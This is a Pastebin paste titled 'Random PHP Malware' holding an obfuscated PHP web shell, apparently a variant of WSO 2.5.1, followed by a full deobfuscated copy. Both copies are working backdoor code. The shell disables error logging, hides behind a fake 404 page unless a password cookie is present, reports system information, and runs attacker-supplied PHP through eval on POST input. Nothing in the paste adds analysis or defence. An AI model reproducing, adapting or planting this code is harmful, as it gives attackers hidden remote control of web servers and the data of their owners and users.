SHARE
TWEET

Random PHP Malware

scurit Sep 25th, 2014 207 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit;
  2. ?>
  3.  
  4.  
  5. ----------------------------------------
  6. DECODES TO:
  7. -----------------------------------------
  8.  
  9. <?php $ {
  10.     "GLOBALS"
  11. }
  12. ["vrvweypznipu"] = "a";
  13. $ {
  14.     "GLOBALS"
  15. }
  16. ["griuefbdqc"] = "auth_pass";
  17. $ {
  18.     "GLOBALS"
  19. }
  20. ["ctxvtooknmju"] = "v";
  21. $ {
  22.     "GLOBALS"
  23. }
  24. ["pioykcea"] = "default_use_ajax";
  25. $ {
  26.     "GLOBALS"
  27. }
  28. ["iwirmxlqtvyp"] = "default_action";
  29. $ {
  30.     "GLOBALS"
  31. }
  32. ["dwembjc"] = "color";
  33. $ {
  34.     $ {
  35.         "GLOBALS"
  36.     }
  37.     ["dwembjc"]
  38. } = "#df5";
  39. $ {
  40.     $ {
  41.         "GLOBALS"
  42.     }
  43.     ["iwirmxlqtvyp"]
  44. } = "FilesMan";
  45. $oboikuury = "default_charset";
  46. $ {
  47.     $ {
  48.         "GLOBALS"
  49.     }
  50.     ["pioykcea"]
  51. } = true;
  52. $ {
  53.     $oboikuury
  54. } = "Windows-1251";
  55. @ini_set("error_log", NULL);
  56. @ini_set("log_errors", 0);
  57. @ini_set("max_execution_time", 0);
  58. @set_time_limit(0);
  59. @set_magic_quotes_runtime(0);
  60. @define("WSO_VERSION", "2.5.1");
  61. if (get_magic_quotes_gpc()) {
  62.     function WSOstripslashes($array) {
  63.         $ {
  64.             "GLOBALS"
  65.         }
  66.         ["zdizbsuefa"] = "array";
  67.         $cfnrvu = "array";
  68.         $ {
  69.             "GLOBALS"
  70.         }
  71.         ["kcltlpds"] = "array";
  72.         return is_array($ {
  73.             $ {
  74.                 "GLOBALS"
  75.             }
  76.             ["zdizbsuefa"]
  77.         }) ? array_map("WSOstripslashes", $ {
  78.             $ {
  79.                 "GLOBALS"
  80.             }
  81.             ["kcltlpds"]
  82.         }) : stripslashes($ {
  83.             $cfnrvu
  84.         });
  85.     }
  86.     $_POST = WSOstripslashes($_POST);
  87.     $_COOKIE = WSOstripslashes($_COOKIE);
  88. }
  89. function wsoLogin() {
  90.     header("HTTP/1.0 404 Not Found");
  91.     die("404");
  92. }
  93. function WSOsetcookie($k, $v) {
  94.     $ {
  95.         "GLOBALS"
  96.     }
  97.     ["gvflxmt"] = "k";
  98.     $cjtmrt = "v";
  99.     $_COOKIE[$ {
  100.         $ {
  101.             "GLOBALS"
  102.         }
  103.         ["gvflxmt"]
  104.     }
  105.     ] = $ {
  106.         $ {
  107.             "GLOBALS"
  108.         }
  109.         ["ctxvtooknmju"]
  110.     };
  111.     $raogrsixpi = "k";
  112.     setcookie($ {
  113.         $raogrsixpi
  114.     }, $ {
  115.         $cjtmrt
  116.     });
  117. }
  118. $qyvsdolpq = "auth_pass";
  119. if (!empty($ {
  120.     $qyvsdolpq
  121. })) {
  122.     $rhavvlolc = "auth_pass";
  123.     $ssfmrro = "auth_pass";
  124.     if (isset($_POST["pass"]) && (md5($_POST["pass"]) == $ {
  125.         $ssfmrro
  126.     })) WSOsetcookie(md5($_SERVER["HTTP_HOST"]), $ {
  127.         $ {
  128.             "GLOBALS"
  129.         }
  130.         ["griuefbdqc"]
  131.     });
  132.     if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) ]) || ($_COOKIE[md5($_SERVER["HTTP_HOST"]) ] != $ {
  133.         $rhavvlolc
  134.     })) wsoLogin();
  135. }
  136. function actionRC() {
  137.     if (!@$_POST["p1"]) {
  138.         $ugtfpiyrum = "a";
  139.         $ {
  140.             $ {
  141.                 "GLOBALS"
  142.             }
  143.             ["vrvweypznipu"]
  144.         } = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode"));
  145.         echo serialize($ {
  146.             $ugtfpiyrum
  147.         });
  148.     } else {
  149.         eval($_POST["p1"]);
  150.     }
  151. }
  152. if (empty($_POST["a"])) {
  153.     $ {
  154.         "GLOBALS"
  155.     }
  156.     ["isvexy"] = "default_action";
  157.     $ {
  158.         "GLOBALS"
  159.     }
  160.     ["uoechymzddd"] = "default_action";
  161.     if (isset($ {
  162.         $ {
  163.             "GLOBALS"
  164.         }
  165.         ["iwirmxlqtvyp"]
  166.     }) && function_exists("action" . $ {
  167.         $ {
  168.             "GLOBALS"
  169.         }
  170.         ["uoechymzddd"]
  171.     })) $_POST["a"] = $ {
  172.         $ {
  173.             "GLOBALS"
  174.         }
  175.         ["isvexy"]
  176.     };
  177.     else $_POST["a"] = "SecInfo";
  178. }
  179. if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) call_user_func("action" . $_POST["a"]);
  180. exit;
  181. ?>
RAW Paste Data
Top